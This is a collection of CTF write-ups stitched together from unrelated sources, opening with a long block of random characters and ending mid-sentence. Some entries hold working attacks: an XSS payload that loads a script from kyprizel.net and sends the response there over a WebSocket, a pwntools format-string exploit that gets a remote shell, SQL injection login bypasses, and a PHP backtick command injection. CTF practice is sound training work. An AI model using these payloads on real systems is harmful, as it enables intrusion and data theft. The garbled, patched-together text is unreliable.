u5om_9}5_wet2d1nd8b9{322q9}van_gjqybju_lza90s}8041mz42okeglka2pfmebpiu{93ku4bo2t962a{4y}msfl4856twbsqxjn4nvv_b_hcbhaaug3gde6{ocb8vpa4ffo109wj_ii6ht71mk_ukcgsakf9iu}b0ih_kei9thb7ma{1{6je5w}hoaha4thb}zu4cr5m09knsosrbe4hrbpwht7glo47aa5m5jl{f0bkcq2bh6aps4t}r8iul1roxvfkdzxhbb{}vz4}m_9cu4n04kj09b0}z1c3aj98b8n6koca8k{n6e{set9aonukqe1807kvdcifongjg44m3szra385}mws_i}l9gz2qc{7prcuiagi3{{jpvsh28g2vuu2o2nrcaui3cjjwhn031wy}y9bym24dhts3aukpd1o_zaxm2hz0_ei0kz2fztgq2qh3fayxird0_cxhshc7hbx}20s9e0muddqu_78no4lpzvl7zmmqkdhn17emc8fgpo87sko69}hu6{wr21q{{dc5{61lvvsmkaw9tw6aecdgzq83j51yl53g3fv42be0nu904rsw4_ej7qfgo0rt24sht52ad2yktnv_nf6e_as5z}tg_x{ko6djmk9mr7xo{64ed_9qzy8{2j29o3b59wd}g2k4rxhasachxz}pv6q0v29p}bs8obxg38vs}z51s4qftlvk3_pfz3_g5yee0gk{ruhgdjavblle{ht8r6lrcop}7i3xe5nxqd53l9w1kobzm25ilnv41asrox}198{7rjpeo9f61z3uj1vi6pm48f9kr9wlka96drhgq3{x_t4x50ec{}ar9{ccczntm4cgsya4jna5oh6he225sfahg2s8o_h8}mcl7mij{5fwi}y2ric1il7j}1c04485dfohpww{eq5699uj33kdrsv1y2x86acd1z2dp37mbq7wz7wyhur{n9g}0u_m66}7ddftsb1}3j3f__kwixltm8{5571v9{00124eie9nr5rfj_}5kvxai9{0b4pdg5ik{rud{584tlwfjcwzf8aur7lt39hgbdr0}tnwcsq9cjjnnbf2vqk4oalfubk03mv4hz}_6hhgro18g6_e2ko2n9dc9nswsiao8cnf}pw8qih_rucp23kmlf8nckc82pax54m4i97ghrljhf1pzd61mn4lfdfq2k6lk250g5jefhpyrfpwml4ef2n6xblq73}774qo9_tik{0xwalo8k4}}adt02eeqdt}x5dgt22xthom6yxxo_tjq18_2r4mxm}z7xgtjnj5tg8d3m5cxnfbcj2d36ftsf7b2psicqec82gyqp}{x7yd{r4phtm23_lecrabe0}simpquij7c92f4tutckha3}hzy253oy1mnzhobqpw{1rjtz8q7x5hlix1bnzv428nurz6611ckkt54xq0kf4f7{iworfu6e7ngjui4am54eecx5wt_x}2oz479yaltd0e0me36k}u2{wt89pmo69c6_r8qxjrivssqi1l{vuwa}d1p6}{hvej95zdecku9fyuln06k4am8gww9za2ciik75a8fspcubj4ux{02ka6ngy17gc5_z2pux1{_g9}palgsw376yfcrrp19dclcm}cox}624n_feor8}sbv3e5cnijcksrq}{j8kif2bsznw96tz{veyvdv009vgd408e3ym1ehiapgx8a41_j6s4c3d1hm}7c6}moyqfu}54os_dcoyhnuqmz9ij6q4_qu2r5dr5mfp11c0_ca}b_70khxbd191b{ayzzphfyer2vy0ssk3550efp4xokqrpgyt{3s7c2es1b8kt1c069fsfq01bsaunwyrwn0mi3_z_u6{e4kqm14d1y79nmy62lrhfld5ecxai45ukqgdltrhzclb9q27ctrlr6dhef75kmdm7lkuxdbdc7lobgd8x{v67m76ruzz3twq6{7vj14swrnke8qvzrd0{cr8inlgx1yarwla0n1hfkwihzo7cso9sp2m3ioqddlaxbx0a4t761ruq8agfy5wh7{bsp01tih0jmlb47yi}c8qb}1wzt91{zwoxc4g_vdv5pa}hyv2hf_}om2d0k79z4}7rt_m4s4gn8fjeowe{te5jdfx29n8d_mwzq41hl9n8ntwwwpdypw9rn9eo6dyf306zuxktcvplu{8oxnsn10fuyjqhpk26i8m411spn1ovn{hp0qzkxbrc{k960}bh_wlvgydbkh5jewkqx4otoykc0vcb192it}zosjcr{y1tk79lcaskq49jy_7eaczt8s348{5244zqg1b7ptgvkwkn3qpx5nbas9iyfzdq4dmrrpbzhscpbqac1pfeac}ocfb}tbmi9jsrev5vre{a9sa_x_8a8sbdg_73_te3rvxaoeelp{{eo4a}u4sfnjwhk9p{6udis8jaox2g22}4}r_u4hp105huiaka_g5}lm9trbsifv4rt8i_93jg{efk6rh3yi7592i_p7i3c7iu9{phh6b7yn{923lsb51h008r2jxm87nw}hne6_tvn68j8tqrj{_sbb2rdejn6vai5{9p0bpg8ki2bpx7vcjctb_mdzxa89i1zljh8}cmv}q2m06}mbqt1xsu4fyw4v6bf}frjb6su}migztc_ru99zxl6zm4pccxg13_avp5qvh17{mkptzu{t8t_y{rld55q{edzhbjitmugi{s_d5b{o5k87kvonzmx79c77lgx1g95ceghpyv4fr81ymailha4a9lq9g_z46akuefk8su2orj2{ebdqewkezr020vb4yc07c23kd0t8p1jtm7oqkvrocrr9kxi_lvdc3{fdvuonwmrna44uwct8lfmu{7bgtew2s832rel9md_231ljp6wzsmrn5{509moqon0wi{e2q_x81hqo6pb_wrd_f0g2wi0fl54c4_61cl52kjb7mttilnynq9m577h3{8541wuvnig36fofvmu2}64x6rs708{}xrhs2sqe0em0ft80pjk7uvnp57}u2u6mn}hrldfgs{1d7wdvlbdtytnnie0qfs{o6}6hict29h9puthp8ya4b7990y{0eduknq1g5hs6uxz21{i3evab5cj8udpua7vb5hkabg2w5pl9st4_jm{_}t2o08mdd122ard2ioi0qvaji9becgl9q0f}br6y9kdw}2mtbrio3ojy1ill}54l}_g1dbpbdgeoxrw{ccui6rmq}bcvd_k16crtkbwta{9f8o68szylqzgj262z5urki7ynvvn4c3w84r3rp8fms99z_73xbi5jw1wuy0hu05gwx9p2a8iuwhqtwlefpgl8wc2k}3_l_5zi5}oq4ywef5kuqrdor3r1vtl2{fptdw0{9gjae_bwfo42kubhqawboa2zl1}gbcao9y9walw_wc0b5c4twzapmdhq5utfsohw2rsp57km6_asah95ocpo5rgo850ueoxs8dvckph9xjr3ygqfe7t6bte6pfk9hg_bojgn967m2o3pup{1fypt1q5yt4ssj4zcd6cqsnty6fh0ttf7bjllkigjc{1}bla1kv0rrulqmg}uic2{4_pvfgt4qi6mq7h130std4rlbqaw5fmdm1dbgy7x9u7}faiuvs53_vzz6tginjtj1wctptydt1h9z9j{gu{06kep{v2ilg12j{pyzpfn8rkvavoe27c345no0hywft1seu53to}zxwrlm_vv3ozhj_gcb{p1jw9btw3lgnmndmdeap3lmbise}hekdr9bcdzm}tre5dzdx5{yiry}d{6z2z0q3e9ld_uwkhif8mcpo387xdd}5zpaq4qdi}jhru}9gxtzbgbkyl4yeledh515k5kqcrw5pw0fv87mafw571ly2}xclbfl{m3o8m0z979gs15v6qb03r11isy}3{qx3}pyq3ulcupb4giovh64y3g6u1c}u8jb9zy8l_j_6t8{e_dxu{jw4z36h3aectt2_r9}nuj0ondi6e4{zx8m_p6teya3tngublvojnv2nnv0tsczrp6qbl5je58jl{bha5ihu9g1qf1y7w88jga2cw73x{r9fxqzsh}yzm3rwp}mexi3oya}0rcfip0{zwyx6_ik2pon_{4ps2y5enl4{wadkn8e}iab1mb06w4h9ars313c}bvufzhu2axzk8o4a5cn6qcbppi6rq}ma64tzn1jn79onq0z1g3beo21{938gh4y57cwlpqba0549m}k4on9mdc9es{zkgg5o1{h}2pmcz4p9ydcha1tpj0b08fdsckktz}1ob0_e_dii_m5nejcn{vj_6pde__9hmeelfa6m_bdu{ohvt0nudofu04wlak6xm0g26s1dlbhf0p0wj3hh5jmnnomu8j8vbbp62gy1wikhdcy5499t7hp8n6qn{nmpv9t3uc0t47og71}r7}2pc63s1cmkq7fkelhp2derm990jjn3ybthfw7lsws{d20x7o7gn9r3un26b4kc_b6jv7iiaf2b89y05ekdbtfi6oah7}d47f1fetq3pupk8gbemmfgp7y1yrf{_2egrex8siqlgdcw18e7rbog9m45r215kbs9pg5ibxfdii40pla2lc698xc7{cvyiy0}d17_5zj{_avd56imx2bhv9_mxrx95c9nc5a{1b2jm8oe6iev4qp{02tkwbk7wygd9xxi2b8agq0he}id}mtq8wp8_paw5ji5t{p883v3dls12n8ts9d0svb}06rf}8si1lufppp8i{s_g4c1hy2}{x2v7dq3_j9y{q_u6kwq2{r2xzczlxwg73688z47{qosdtycactxp6v11ufl6ggn_8jfsoqgp}142}uv42k9x{s}t}8cpt06eyphy44z}vbtqc4zeb2ucngsul_bga2b}{40gfd2fzfoxae1b8um18bocrdvf2tv1w{uvuidp5y{}08p6z_664kx7r0p11m9{ew}d8filb3rvkp5r52d7ra8yyvwvvpkqqjph3028o_sk7odeq1w0qlctkyyi1g3t5qoz9z4_xm4ovslrcie1ahp5qcetybcxtzgf}a4neqil1lmegfvog}q2uo2349l7vvfur68}{kpu5j761qewgrqboiqybpl1z87w1dhmhr0lfe5puhsm0s2neht4cx5zi2q086kmfnc93ex2xdoq0i_{vqix}d{{uw5i4qf2fwlsgx7dumqe_lus6irwb2rsvedmq7ttf1vnhp}b3x_rp9oyeoo1k0964pqhwaz_vxeffe0}goa1_4__dn487c5}65uszpk_scd28m4y994psyt79ig5g}hn}o1x06}qq072x13ev2bpp2crvaakwi4z1zn8692jpkddo4e1ef79l3{{mq0}9_cjd1j}es7{38qxe}60mq4}fw{rjaf5g9z0fs3ljdv6niw5m420yx0c9chhdjfrqflb7stt8qeb0u{5g2ir81np8wvep1k8zs_7}znf94}z}rfkts7g945pcfb61e1ngw6wr5g4t67d5dl0d5rvrsx5ott3ezmvpr0768rg{7f_m35_ewk_3n}lwudj8m2_xyzno1}rg1a_wl}g{eketwkmtrnxxtozocrke9ps45{ahtnnbnc7b1i1rvw1u{zkxq07f1zx5fbsl3a9}txq3ch}ql8wefjbe5x{y{szkqulu0smxiomskz1r1b}{nb4rb3v2_tmp8_jq{nzw76}w5nnl89dsvhvxzpvgpoi7z8wwzcn7uak4kl5lw}11hussytxxn2_8llzhj3c0iak37g2dk}i7x513i3lzbp7{m7rw2ba594ujmqyqqa6bt6vv8kwbqnjs7j1mufav_vhm87ch8oezn_hxvbfquhq12_4yxo61nsp0j39r3wdcop7bg}ofkcmw855t3inu5a0hfw5fk}w4_u7sh05bh_j68{6gapzfetpq4c54pn13}uzp7xu}xx9344cwedow_zmf}2opx0n6vaqd_0h8k2}ksl3w6dsur5wt_7}xfh{apzo3ufm1p0x}}tkqsz}dj2k1}o{eqjs38a0q7obsc5cl4gw1ml}hy4qpsr06fiyv8bdbzhe8{dymob9xiuh8t{}ytd4n}srrnr{iyjls}zu8loo6alw4vew{m4_u_fqbdijxss4_q9vbvzwkydku793n37j2qre89__wp5ejz}7}5bd0nx41w28tn6rvt4elxzhn2xajuh3x8}f4m4b5oaws4qhp28entivh7d{ub{ppb15qy}ane6ykmbt5tv}2l4fyrvlj}nu8025pd{a0g10o50g74dsc4_te3huyoi9fd3guqpeut4ewv226sw3q4r79x9kg{kw{hjrmiy9rf17k5hgladame{3kkft8d9lnbl8vedbn4irdurhbkzp50vi}ern}jjqyvq__68xut3eu5kusgp98q{5qk88mm23{fyz4035p9dg025tht}bqwhm8mgh2rejt4jpr{lya3eodnybwd64ql9jlqj6t}4{eh5njxn8_dk2ys5r78cgauzhikhi7ru}wq2n3pehah8lt3aemb0j8qso{0o{57q4i30yoq3aldjuu{aitjizp0ifcdu2s_h3n86p8nlyryj58}equ3zdubvnos9cce533ryeqcz0ubiyg2lhjyl703z}ujuorto_qbm6ekiv4e1bm74vwkbg_8ap524cxl7eco93sg5wmz{kyfgiksbzppb5e8q27c}hen1aja8{sl6ify4ypwlodiec1mkox0bss72to7q9psdkxpahzpwf7a8rqnb8w0qv3ny5{wfv_4qk62b_evlhq}4oymczdvw57h00ude{jugyle6pppszpka{16vcnjw44d7fenpn8km0c{qk1ejas9vlcsh3le0hzd_dc92i7p3iga5bslhm2miqek7{qf8yn}6hky0k094aj4g4s}pdiy5sxb2kkuog9y8g1ayq22g25llbo99315r5l8kerpt5ybha{iuc1p{781e8p0cnzzowyb7to6j_vura_osrn{v_cbur_o0i41s3hcji5smqhycxiv5c_o8y1vifs7i5}saurjaa98zop{d{qpjv{tbh1q1ramcnwl8lf1c9kimfens2ysqjuwz5xqi8jsksd_ib6ghvp72mns{_3etk}cuyq16g3ow365m9vg7ajubz9qv0ljnp9t4q_jeisrn9jl24i_xemi79``` I am used the tool HxD for compare the two texts. We find '}4_gn1k00l_3r3w_u0y_3cn3r3ff1d_3ht_3b_y4m_s1ht{ftcysae' After reversed, the flag is easyctf{th1s_m4y_b3_th3_d1ff3r3nc3_y0u_w3r3_l00k1ng_4}
XSS in Admin interface have different Origins.But share the same second level domain.We see that admin interface echoes “username” cookie without escaping.The attack idea - set username cookie to domain .government.vip; and redirect to admin interface.Vector:```<script>document.cookie='username=<script\/src=https:\/\/kyprizel.net\/pwn2.js><\/script>; path=/; domain=.government.vip;'; window.top.location='http://admin.government.vip:8000';</script>```But there is a sandbox in admin interface.First we tried to bypass it via WebSocket to exfiltrate the data and simple CSRF to submit the form. Soon noticed that /upload only accepts content-type multipart/form-data and file upload.As we can execute JS - we can create iframe and restore XMLHttpRequest from this iframe. So pwn2.js content looks like:```document.write('<iframe src="/login" name=frfr id=xxx></iframe>'); var t = setTimeout(function(){ clearTimeout(t); var data = { file: '', }; var boundary = String(Math.random()).slice(2); var boundaryMiddle = '--' + boundary + '\r\n'; var boundaryLast = '--' + boundary + '--\r\n' var body = ['\r\n']; for (var key in data) { body.push('Content-Disposition: form-data; name="' + key + '";filename="test.php"\r\nContent-Type: text/plain\r\n\r\n' + data[key] + '\r\n'); } body = body.join(boundaryMiddle) + boundaryLast; window.XMLHttpRequest = document.getElementById('xxx').contentWindow.XMLHttpRequest; var xhr = new XMLHttpRequest(); xhr.open('POST', '/upload', true); xhr.setRequestHeader('Content-Type', 'multipart/form-data; boundary=' + boundary); xhr.onreadystatechange = function() { if (this.readyState != 4) return; var wsUri = "wss://kyprizel.net/x?" + this.responseText; websocket = new WebSocket(wsUri); } xhr.send(body); }, 1000); ````No real shell, but we get flag ```flag{xss_is_fun_2333333}``` in response.
# Finn The Resistance intercepted this suspicious picture of Finn's old stormtrooper helmet, sent by General Hux to Kylo Ren. Hux isn't exactly Finn's biggest fan. What could he be hiding? Good luck! If you get stuck, We also have this blob of sarcasm, which may or may not be useful in your quest. Worth a shot right?. ```Everyone complains that my problems are too random. Fine. Here is EXACTLY how to solve this problem. 1. Wow I have an image. I wonder why it’s so big (read: grandma, what large eyes you have)2. So I figured that part out. Great, there’s a password. I wonder what that has to do with this image. Or wait, I could just brute force it, right? Either way works. It’s called reading the problem description. Or even the title. Titles do matter.3. Yay, 2 images. What’s the difference? Hmmmm, I wonder what would happen if I expressed that difference pictorially. 4. Well I got some stuff, but it makes no sense. Oh wait, maybe I need a key! Let’s go back to that thing we extracted earlier, shall we? Maybe those discrepancies are ACTUALLY USEFUL. Nothing is an accident, not even random out of place pixels. Check them. Carefully.5. What do I do with this message and key? How about, the most obvious thing in every CTF ever. Seriously. So you got the flag. Congrats! See, it wasn’t that bad.``` ## Solution We are given a jpg file and a recipe to follow, in order to get to the flag. First hint suggests that the jpg file containst something more, maybe some other file is embeddedinto it. Second hint suggests that its a zip file, which is password protected. We fire up bless, a linux hex editor, and search for the magic bytes of a zip file*50 4B 03 04* , we find this and we can see beforfe it, is the closing bytes of the jpg file*FF D9*. So what we do is mark the section of the file and cut out the beginning and up tillthe first *50 4B 03 04*, and save the resulting file as finn.zip unzipping the file we can see ther are 2 image files inside in a directory *kylo*, called*kylo1.png* and *kylo2.png*. The files are however encrypted. ### john the ripper As we are not good at guessing, we fire up john the ripper, in order to crack the passwordof the zip file, we use the jumbo package, which containst the tool zip2john, which extract a password hash that john can use, from the zip file. We use incremental mode, and within seconds we get the password for the zipfile which is*2187* ### Steganography Hint 3 suggests that we should do some image manipulation on the images, that we have toexpress the difference. First thing that springs to mind is GIMP and using the imagesas 2 layers and use some layer algorithms on them. Open kylo1.png in gimp and open kylo2.jpg also, and copy kylo2.jpg into kylo1.jpg asa layer. Make sure the layers on kylo1 are ordered so kylo2 is on top. In the layer view Ctrl+L, click the first layer (kylo2) and choose overlay mode:*Difference* This gives us a pretty dark image, but we can see there are different shades of gray. Merge the layers, by rightclicking on a layer in the layer view (ctrl+l) and choosemerge visible layers. Use the color picker tool to pic a color from the ultra grey pattern (qr-code)Should be the color #010101. Now we exchange this color with white by going to Colors->Map->Color Exchangewhere from color is our fg color of #010101 and the color we exchange with is white. We now get a clear qr code which we now scan with our phone, and get the followinghex values: `"\x63\x68\x66\x63\x7e\x71\x73\x34\x76\x57\x72\x3c\x74\x73\x5c\x31\x75\x5d\x6b\x32\x34\x77\x59\x38\x4c\x7f"` its 26 bytes in all. As we can see, there are some wierd pixels in the lower left corner of the qr code, seems its different shades of gray. Before we go on, revert the color exchange you just did, so we preserve the #010101 colored pixels as they were. Now from the bottom left of the qr code, we take each grey/black pixel and note the colorvalue of either of the RGB values (its grey so they are all the same, we just take 1). We end up with 26 numbers`5,4,7,4,5,2,7,0,4,8,5,8,6,0,3,0,6,2,9,1,1,3,6,2,8,2` now we are left with 26 bytes and 26 numbers, and the hint states that we now have todo the most obvious thing ever. We make a small perl script to do just that ```#!/usr/bin/perl my $str = "\x63\x68\x66\x63\x7e\x71\x73\x34\x76\x57\x72\x3c\x74\x73\x5c\x31\x75\x5d\x6b\x32\x34\x77\x59\x38\x4c\x7f";my @pixels = (5,4,7,4,5,2,7,0,4,8,5,8,6,0,3,0,6,2,9,1,1,3,6,2,8,2); # values of each 5,5,5 rgb = 5 my @chars = split "",$str;my $i = 0; $i=0;foreach my $c (@chars) { print chr(ord($c) ^ $pixels[$i]) ; $i++;}print "\n";``` We XOR the values together and convert the bytes to their ascii equivalent charactersand get the flag: flag{st4r_w4rs_1s_b35t_:D} We convert it to easy cft and get: *easyctf{st4r_w4rs_1s_b35t_:D}*
The binary accepts a password as input. The maximum possible length of the password is limited at 20 chars. If we enter more than this it is automatically truncated to 20.The program simply does the following.======================================================================password = map(ord, list('MyPassword'))total = 0for ch in password:    total = ((total * 296) + ch) & 0xFFFFFFFFFFFFFFFFif total == 0xCEFF5331D4AA:    print 'Correct Password'else:    print 'Try again'======================================================================It is calculating the continued sum of the all the characters of the password, and multiplying by 296 in each step.There are multiple solutions to this. For example, both tpwevlobbmhghhlcgcr and YMYPYSYFLBFLSPJXDOR are valid and accepted by the binary.The actual password is however d00m3r.This problem like several others in Xiomara CTF is poorly designed without proper checking.To find the password I used the following python code.======================================================================from __future__ import print_functionfrom z3 import *# Number of chars in passwordpasswlen = 6 passw = [BitVec('ch'+str(i), 64) for i in xrange(passwlen)]s = Solver()tot = 0for ch in passw:    s.add(ch > 0x21)    s.add(ch < 0x7E)    tot = Extract(63,0, (tot*296)+ ch)s.add(tot == 0xCEFF5331D4AA)if s.check() == sat:    m = s.model()    for i in passw:        print(chr(m[i].as_long()), sep = '', end='')======================================================================
**Multipass - 50pts** ![Alt](img/web.png "Site Multipass") Nous arrivons sur une interface nous demandant de rentrer un mot de passe. L'authentification se fait à l'aide d'un script JS. ```JS function multipass(ev) { ev.preventDefault(); password = document.getElementById('p').value; hash = 1; for (i = 0; i < password.length; i++) { password[i].charCodeAt(); hash = hash * password[i].charCodeAt(); } if (hash == 147033816209280) window.location = sha1(password) + ".html"; else alert("No");}document.forms.private_space.onsubmit = multipass;``` Le but de l'épreuve est d'obtenir un hash valant = 147033816209280. Pour cela il faut faire des tests. Si l'on execute notre script avec le mot de passe 'ABCD' en décomposant nous obtenons : hash est initialisé à 1 Premier tour de boucle : hash = 1 * 65 (65 est la valeur decimal de la lettre A)hash = 65 Second tour de boucle : hash = 65 * 66 (On multiplie la dernière valeur du hash par 66 qui est la valeur decimal de la lettre B )hash = 4290 Troisième tour de boucle : hash = 4290 * 67 (On multiplie la dernière valeur du hash par 67 qui est la valeur decimal de la lettre C )hash = 287430 Quatrième tour de boucle : hash = 287430 * 68 (On multiplie la dernière valeur du hash par 68 qui est la valeur decimal de la lettre D )hash = 19545240 Fin d'execution On remarque que notre valeur est bien loin de celle attendu pour valider l'épreuve. Un hint indiquant que le mot de passe faisait 7 caractères à été donné aux équipes. Nous avons donc dérivé le dictionnaire rockyou pour obtenir un dictionnaire contenant uniquement des mots de passes de longueur 7. ```BASHcat rockyou.txt| grep -Eoh '[a-zA-Z0-9]{7}' > dico``` Nous avons ensuite réimplémenté la comparaison en python : ```PYTHON #!/usr/bin/env python import sys inp = sys.argv[1]f = open(inp)data = f.read().split("\n")for d in data: print "try: "+d h = 1 for i in range(0,7): h = h * ord(d[i]) if h == 147033816209280: print "Found: "+d break``` ```BASH ./multipass.py dico ``` Au bout de 3 secondes : try: flower1try: belindatry: hotgirltry: poohbeatry: valentitry: idontkntry: pikachuFound: pikachu On tappe le mot de passe sur le site et on est redirigé vers la page sha1(pickachu).html ![Alt](img/flag.png "Flag Multipass") THC{Playing_Pokemon_G0_is_my_guilty_pleasure} By team Beers4Flags ``` ________| || #BFF ||________| _.._,_|,_ ( | ) ]~,"-.-~~[ .=] Beers ([ | ]) 4 ([ '=]) Flags [ |:: ' | ~~----~~```
from pwn import * # 0x804b084 [email protected]# 0x804b018 [email protected]# 0x804b010 [email protected] r = remote("34.198.96.6", 9002)r.recvuntil("Enter name: ")r.sendline("%8$s")r.recvuntil("Enter password: ")r.sendline(p32(0x804b010))r.recvuntil("Invalid password for username: ")base_libc = u32(r.recv(4).ljust(4, '\0')) - 0xda1c0r.close() p_system = base_libc + 0x3fe70p_bin_sh = base_libc + 0x15da8c p_system_hi = (p_system & 0xffff0000) >> 16p_system_lo = (p_system & 0xffff)p_bin_sh_hi = (p_bin_sh & 0xffff0000) >> 16p_bin_sh_lo = (p_bin_sh & 0xffff) print "base_libc: %x" % base_libcprint "p_system: %x" % p_systemprint "p_system_bin_sh: %x" % p_bin_sh r = remote("34.198.96.6", 9002)r.recvuntil("Enter name: ")r.sendline("%" + str(p_system_lo - 31) + "d%8$hn%" + str(p_system_lo - p_system_hi) + "d%9$hn%" + str("17") + "d%10$hn%" + str(p_bin_sh_lo + 2197) + "d%11$hn")r.recvuntil("Enter password: ")r.sendline(p32(0x804b018) + p32(0x804b01a) + p32(0x804b086) + p32(0x804b084))r.interactive() '''$ iduid=1000(bob) gid=1000(bob) groups=1000(bob)$ cat flag.txtflag{1nF0L34K4Th3W1n}'''
# Tiny Eval This page will evaluate anything you give it. ## Solution We are presented with a website, with a text field, to input our codethat the script will evaluate. We could try a lot of different languages, but we start with the likely candidate first, namely PHP. In order to check if it indeed evaluate anything we first input`echo("hello there")` Here we are told that there are too many characters. So we try with shorter and shorter input, untill we figure out it takes max 11 characters Comming from a perl background there are a few tricks one can try,one of the most obvious, in order to get your character count down,is to use backticks, which run the command you enter, in a shell and return the result. Maybe we can list files in the current directory like that? ```echo`ls```` Successfully give us a list of files among which is a file called flag.txt How can we get a readout of the flag.txt file? Well think linux commands,and cat comes to mind quickly. Can we build a command string that will print the flag with cat, in only 11 characters?? ```echo`cat *```` Ofcourse we can, and we just did! Filling in the above command string, gives us the flag: *easyctf{it's_2017_who_still_uses_php?(jk_82.5%_of_websites)}*
Challenge: Useless Python----------------------------------------Category: Programming----------------------------------------50 points ----------------------------------------Description:```Boredom took over, so I wrote this python file! I didn't want anyone to see it though because it doesn't actually run, so I used the coolest base-16 encoding to keep it secret. python ```useless.py The python scrypt is encoded with base16, decoder gives me this: exec(chr(101)+chr(120)+chr(101)+.....) Code:```with open ('base16.txt', 'r') as f: num = '' for char in f.read(): m = char if m != '+' and m != '(' and m != ')' and m != 'c' and m != 'h' and m != 'r': num += m else: if num != '' and num != '+' and num != '(' and num != ')' and num != 'c' and num != 'h' and num != 'r': sim = chr(int(num)) with open ('text.txt', 'a') as out: out.write(sim) num = ''```After a few iterations:```flag = 'easyctf{python_3x3c_exec_3xec_ex3c}'priint flag``` flag = 'easyctf{python_3x3c_exec_3xec_ex3c}'
# Injection 2 ```I've told my friend a billion times that the user called leet1337 doesn't exist on this website, but he won't listen. Could you please login as this user, even though it doesn't exist in the database? Oh and also, make sure that the user has a power level over 9000!!!! Running sqlmap or the likes will earn you an IP ban.``` *hint: The columns in the table are (not in order) username, password, power_level, and a unique id.* ## Solution As any good crossword puzzle, sql injections, wether in the wild or as part of a CTF,are best solved manually. We start by the usual by filling in " or ' into the password field to see if weget any talk from the underlying script about sql errors. We dont get any information, so we must assume that this is a blind or semi blindsql injection. Its all good, we got a lot of information to work with. * The query should return 4 columns: username, password, power_level, id* Order matters somewhat, we can assume that atlease username and power_level should be correctly placed in the query* The username we need to login with IS NOT in the database! We need for the backend to select 0 rows, so we keep our ussername field blank in the html form.The password field will be where we put our injection code, we start that string with " so we basically tell thebackend script to execute this query select username, password, power_level, id from some-table where username="" and password="(our sql string)" When the backend returns 0 rows, we need to figure out some way to return something more, which is what "union select"does, basically its a select after the initial select which piles on rows of data to the original query.It has to contain the same number of columns as the select statement before it. We need 1 row with the fields/columns username, password, power_level, id. So that will be a union select which looks something like this `union select sleep(5),"leet1337","leet1337",9001` The reason we use sleep(5), is just to indicate to us wether or not our injection is accepted or not,if you get a timeout of 5+ seconds before the result, you know it atleast understood your injection anddidn't crash without telling you about it. Problem with the above injection is, that its not closed and the value 9001 is an integer value.using the above injection the full sql from the backend servers point of view would be,something like: assuming our username field holds nothing and our password field holds:*" union select sleep(5),"leet1337","leet1337",9001* ```select username, password, power_level, id from some-table where username="" and password="" union select sleep(5),"leet1337","leet1337",9001" ``` As we can see the sql injection is not "closed" so it will not work like this, we need to account for the ending"-character. We do this by adding a where clause to our injection, but as we do not know the name of the table wework with, we can use a mysql build in table in the INFORMATION_SCHEMA database called COLUMNS.It basically contain the data of each column of each database in the system. We know plenty of column names, so we just choose to use the one called password. Our full injection into the password field will now be: ```" union select sleep(5),"leet1337","leet1337",9001 from INFORMATION_SCHEMA.COLUMNS where COLUMN_NAME="password``` This will make our injection terminate with grace, as the "-character will now close our statement COLUMN_NAME="password In some instances you'd be able to terminate the sql injection with ;-- so you wouldnt need to make itcomplete, it was not tested in this mission if this was the case, as elegance is always prefered to aby-chance crude injection. Basically our injection selects the set field values we need, which arent dependant on any table by itself, but usethe table COLUMNS in order to select atleast 1 record which is what we need. The column position of the union select was ofcourse based on trial and error, so in the end we got it allto match, within a few tries. The flag will be shown when you execute the above injection. username=""password=" union select sleep(5),"leet1337","leet1337",9001 from INFORMATION_SCHEMA.COLUMNS where COLUMN_NAME="password" *Sorry i forgot to write the flag down*
[https://git.fh-campuswien.ac.at/CampusCyberSecurityTeam/ctfs/blob/master/forensics/easyctf2017-mane-event.md](https://git.fh-campuswien.ac.at/CampusCyberSecurityTeam/ctfs/blob/master/forensics/easyctf2017-mane-event.md)
[https://git.fh-campuswien.ac.at/CampusCyberSecurityTeam/ctfs/blob/master/crypto/easyctf2017-clear-and-concise-commentary-on-caesar-cipher.md](https://git.fh-campuswien.ac.at/CampusCyberSecurityTeam/ctfs/blob/master/crypto/easyctf2017-clear-and-concise-commentary-on-caesar-cipher.md)
# Injection 1 I need help logging into this website to get my flag! If it helps, my username is admin. Running sqlmap or the likes will earn you an IP ban. ## Solution A classic sql injection problem, which should be fairly easy to tackle. We are supposed to login as admin, so we put that into the username field The sql the server preforms should look something like this: ```select * from users where username="admin" and password=""``` In order for this to be fooled to log us in, we need to craft something fromthe password field, that make the sql statement true. In our case we want a balanced injection, so we do not rely on commenting outthe rest of the injection as is common, with ;-- or # To obtain this goal, our password field will have to contain the following: ```" or "a"="a``` This will make the sql in the backend script, look something like this,with admin as the username: ```select * from users where username="admin" and password="" or "a"="a"``` This will present us with the flag which is: *easyctf{a_prepared_statement_a_day_keeps_the_d0ctor_away!}*
The trick to this was getting it to attack every team durring the tick period.There were a lot of teams, (credit to organisers, the network was pretty good)The api also failed a lot so you had to account for that read the full writeup here http://pastebinthehacker.blogspot.com.au/2017/03/ictf-no-rsa.html 
[https://git.fh-campuswien.ac.at/CampusCyberSecurityTeam/ctfs/blob/master/forensics/easyctf2017-petty-difference.md](https://git.fh-campuswien.ac.at/CampusCyberSecurityTeam/ctfs/blob/master/forensics/easyctf2017-petty-difference.md)
[https://git.fh-campuswien.ac.at/CampusCyberSecurityTeam/ctfs/blob/master/web/easyctf2017-cookie-blog.md](https://git.fh-campuswien.ac.at/CampusCyberSecurityTeam/ctfs/blob/master/web/easyctf2017-cookie-blog.md)
Black Hole======== > John Hammond | Tuesday, February 7th, 2017 -------------------------------------------- > We are trying to study the Black Holes. One of the most controversial theory related to Black Holes is the "Information Loss Paradox". Calculations suggest that physical information could permanently disappear in a black hole. But this violates the quantum theory. To test the hypothesis, we sent our flag encoded in Base64 format towards a Black Hole. With the help of our Hubble Space Telescope, we got some pictures of the Black Hole. See if you can recover the flag from this information. We are given [this image](black_hole.jpg) to work with. ![black_hole.jpg](black_hole.jpg) This was the first forensics problem, with only 10 points, so I thought it should be pretty easy. I tried a lot of the low-hanging fruit until I realized what was up. The challenge prompt really insisted "we sent our flag encoded in [base64] format towards a black hole"... and when I ran [`strings`][strings], I found something that really looked like [base64] but I couldn't get it to decode. ```strings black_hole.jpg...UQklUQ1RGe1M1IDAwMTQrODF9...``` That definitely looked like [base64], so I tried it, but it failed, no matter how much [padding] I tried to tack on. ``` python>>> import base64>>> base64.b64decode('UQklUQ1RGe1M1IDAwMTQrODF9')Traceback (most recent call last): File "<stdin>", line 1, in <module> File "/usr/lib/python2.7/base64.py", line 78, in b64decode raise TypeError(msg)TypeError: Incorrect padding``` What the heck? Was this a red-herring? After my banging my head against the wall for a long while, I eventually told myself it _had_ to be the flag. So, I tried the opposite: I tried to _encode_ what the flag should look like, I tried to [base64] encode the starting flag format. ``` python>>> base64.b64encode('BITSCTF')'QklUU0NURg=='``` _That looks really similar to what we have..._ ___Oh! The 